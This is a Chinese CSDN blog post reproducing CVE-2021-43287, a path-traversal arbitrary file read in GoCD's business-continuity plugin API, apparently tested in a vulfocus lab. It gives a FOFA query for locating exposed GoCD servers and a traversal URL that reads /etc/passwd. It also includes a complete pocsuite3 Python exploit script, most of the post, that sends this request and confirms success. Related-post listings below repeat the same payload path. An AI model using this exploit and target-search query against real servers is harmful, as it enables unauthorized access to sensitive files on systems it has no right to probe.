GoCD plugin 任意文件读取漏洞 CVE-2021-43287

已于 2022-09-07 15:38:32 修改
阅读量519 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web服务器
于 2022-09-07 14:57:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44522540/article/details/126743585
版权

漏洞描述

GoCD plugin aip 参数中的 pluginName 参数存在任意文件读取漏洞,导致攻击者可以获取服务器中的任意敏感信息

fofa语法

title=“Create a pipeline - Go”

POC

/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd

pocsuite3验证

vulfocus环境
在这里插入图片描述

from collections import OrderedDict
from urllib.parse import urljoin
import requests,urllib3
import urllib.request
import ssl
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict,OptString, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY


class TestPOC(POCBase):
    vulID = '0'
    version = '1.0'
    author = ['xxx-test']
    vulDate = '2021-11-02'
    createDate = '2022-09-07'
    updateDate = '2022-09-07'
    references = ['']
    name = 'GoCD任意文件读取'
    appPowerLink = ' '
    appName = 'GoCD'
    appVersion = """GoCD_14.2.0"""
    vulType = VUL_TYPE.ARBITRARY_FILE_READ
    desc = '''GoCD任意文件读取'''
    samples = ['']
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.WEBAPP



    def _verify(self):
        result = {}
        path = "/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"
        url = self.url + path
        r = urllib.request.Request(url)
        with urllib.request.urlopen(r, timeout=10) as resq:
            text = resq.read().decode('utf-8')
            if 'root' in text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['body'] = text
                return self.parse_output(result)
            else:
                pass



    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output



register_poc(TestPOC)
hana-u
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
复现CVE-2021-43287GoCD plugin 任意文件读取漏洞
记录并分享学习安全的知识点..
09-27 311
GoCD plugin aip 参数中的 pluginName 参数存在任意文件读取漏洞,导致攻击者可以获取服务器中的任意敏感信息。
GoCD plugin 任意文件读取漏洞--CVE-2021-43287
U_U520的博客
11-29 373
【代码】GoCD plugin 任意文件读取漏洞--POC。 CVE-2021-43287
[文件读取]GoCD 任意文件读取漏洞 (CVE-2021-43287)
wj33333的博客
11-14 260
其前身为CruiseControl,是ThoughtWorks在做咨询和交付交付项目时自己开发的一款开源的持续集成工具。后来随着持续集成及持续部署的火热,ThoughtWorks专门成立了一个项目组,基于Cruise开发除了Go这款工具。GoCD的v20.6.0 - v21.2.0版本存在任意文件读取漏洞,可以通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd 对文件进行读取
CVE-2021-43287 GoCD任意文件读取 漏洞复现
m0_58596609的博客
12-29 2248
CVE-2021-43287 GoCD任意文件读取 漏洞复现
gocd-vault-secret-plugin:HashiCorp的Vault的GoCD秘密插件
03-19
Vault Secret Manager插件这是一个GoCD Secrets插件,允许用户将用作GoCD服务器的秘密管理器。该插件支持KV Secrets Engine的版本2。目录使用Docker设置保管库运行以下命令以启动Vault的Docker容器docker run --cap-...
docker-elastic-agents-plugin:用于GoCD的基于Docker的弹性代理
05-08
适用于Docker的GoCD Elastic Agent插件 目录 安装 可找到安装文档。 建立代码库 要构建罐子,请运行./gradlew clean test assemble 将您自己的Docker映像与弹性代理一起使用 该插件执行以下泊坞窗命令的等​​效项以...
gocdGoCD的主要存储库-连续交付服务器
02-04
GoCD可帮助您自动化和简化构建测试发布周期,从而无忧地连续交付产品。 要在学习关键GoCD概念的同时快速构建您的第一个管道,请访问我们的 。 开发设置 这是一个Java / JRuby on Rails项目。 这是设置的指南。 ...
docker-swarm-elastic-agent-plugin:用于GoCD的基于Docker群的弹性代理
03-04
适用于Docker Swarm的GoCD Elastic Agent插件 目录 安装 可找到安装文档。 建立代码库 要构建罐子,请运行./gradlew clean test assemble 将自己的Docker映像与弹性代理一起使用 提供更多有关构建自定义GoCD代理...
docker-gocd-server:GoCD的Docker服务器映像
05-05
如果您想提供诸如SSH私钥之类的安全凭证,则可以挂载/home/go docker run -v /path/to/godata:/godata -v /path/to/home-dir:/home/go gocd/gocd-server:v21.2.0 注意:确保容器中的go用户可以访问/path/to/home-...
some_pocsuite:用于漏洞排查的pocsuite3验证POC代码
05-23
some_pocsuite 用于企业内部进行漏洞排查与验证的的pocsuite3验证POC代码(pocsuite3是知道创宇安全团队的开源漏洞测试框架)。 由于原Pocsuite已停止更新,因此将原来的POC代码全部重新改写并迁移到pocsuite3,原POC备份在PocsuiteV2中。 插件代码编写 使用pocsuite3 漏洞测试框架,插件编写请参考 pocsuite3 项目插件编写要求。 序号 poc 说明 1 hikvision-2013-4976_web_login-bypass.py 海康威视cve-2013-4976匿名登录验证绕过 2 weblogic-vul-check_all_rce.py weblogic反序列化漏洞CVE-2016-0638,CVE-2016-3510,CVE-2017-3248,CVE-2018-2628,CVE-2018-2893, CVE-
go-artifactory-pluginGoCD的Artifactory插件
02-05
ThoughtWorks 插件 该项目是该插件的版本的简化分支,因为他不再更新其版本,并且与GoCD最新版本(> = 17.2)不兼容。 作为原来的插件没有它不生成属性上传文物。 产品特点 将工件上传到Artifactory(包括对照Artifactory生成的校验和进行校验) 上传构建详细信息 该插件需要为GoCD任务设置这些环境变量 ARTIFACTORY_URL ARTIFACTORY_USER ARTIFACTORY_PASSWORD 安装 下载[plugin jar](修复此文件),然后复制到GoCD服务器上的plugins / external目录中,然后重新启动。 有关
PTB-CVE
zip471642048的博客
05-05 1001
文章目录Apache HTTPD 多后缀解析漏洞 Apache HTTPD 多后缀解析漏洞 如果运维人员给.php后缀增加了处理器: AddHandler application/x-httpd-php .php 那么,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。 上传一个以jpg为后缀的一句话木马但是包含.php 会被成功解析成php ...
MKdocs 任意文件读取漏洞 CVE-2021-40978
weixin_46801402的博客
11-16 347
MKdocs 任意文件读取漏洞 CVE-2021-40978
GoCD任意文件读取(cve_2021_43287)
m0_65150886的博客
12-29 354
其前身为CruiseControl,是ThoughtWorks在做咨询和交付交付项目时自己开发的一款开源的持续集成工具。后来随着持续集成及持续部署的火热,ThoughtWorks专门成立了一个项目组,基于Cruise开发除了Go这款工具。GoCD的v20.6.0 - v21.2.0版本存在任意文件读取漏洞,可以通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd 对文件进行读取
Pocsuite3--编写破壳CVE-2014-6271_Shellshock的POC
17bdw的编程备份笔记
05-26 35
前言 编写破壳CVE-2014-6271_Shellshock的POC,把公开出来的路径封装起来,作为Pocsuite3的验证POC 情况1:网站无法访问,返回失败 情况2:网站可以访问,无漏洞 情况3:网站可以访问,有漏洞 优先获取网站本身的cgi路径,如果没有,就用自带的cgi路径测试。 代码 15分钟,35个站点 #!/usr/bin/env python # coding: utf-8 ...
weblogic CVE-2019-2725 pocsuite3的 poc
qq_42133828的博客
07-03 1946
import re from collections import OrderedDict from urllib.parse import urljoin from pocsuite3.api import Output,POCBase,register_poc,requests,logger,POC_CATEGORY,OptDict from pocsuite3.api import ge...
GoCD 任意文件读取漏洞 (CVE-2021-43287)
最新发布
qq_23003811的博客
07-15 190
其前身为CruiseControl,是ThoughtWorks在做咨询和交付交付项目时自己开发的一款开源的持续集成工具。后来随着持续集成及持续部署的火热,ThoughtWorks专门成立了一个项目组,基于Cruise开发除了Go这款工具。GoCD的v20.6.0 - v21.2.0版本存在任意文件读取漏洞,可以通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd 对文件进行读取
一文搞懂Go语言的plugin
TonyBai
07-19 2705
要历数Go语言中还有哪些我还没用过的特性,在Go 1.8版本[1]中引入的go plugin[2]算一个。近期想给一个网关类平台设计一个插件系统,于是想起了go plugin^_^。Go ...
go自动化部署工具有哪些
06-03
3. GoCDGoCD是一款使用Go语言开发的持续交付工具,支持自动化构建、测试和部署等功能,适用于多种应用程序。 4. Kubernetes:Kubernetes是一款使用Go语言开发的容器编排工具,支持自动化部署、伸缩、容错等功能,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值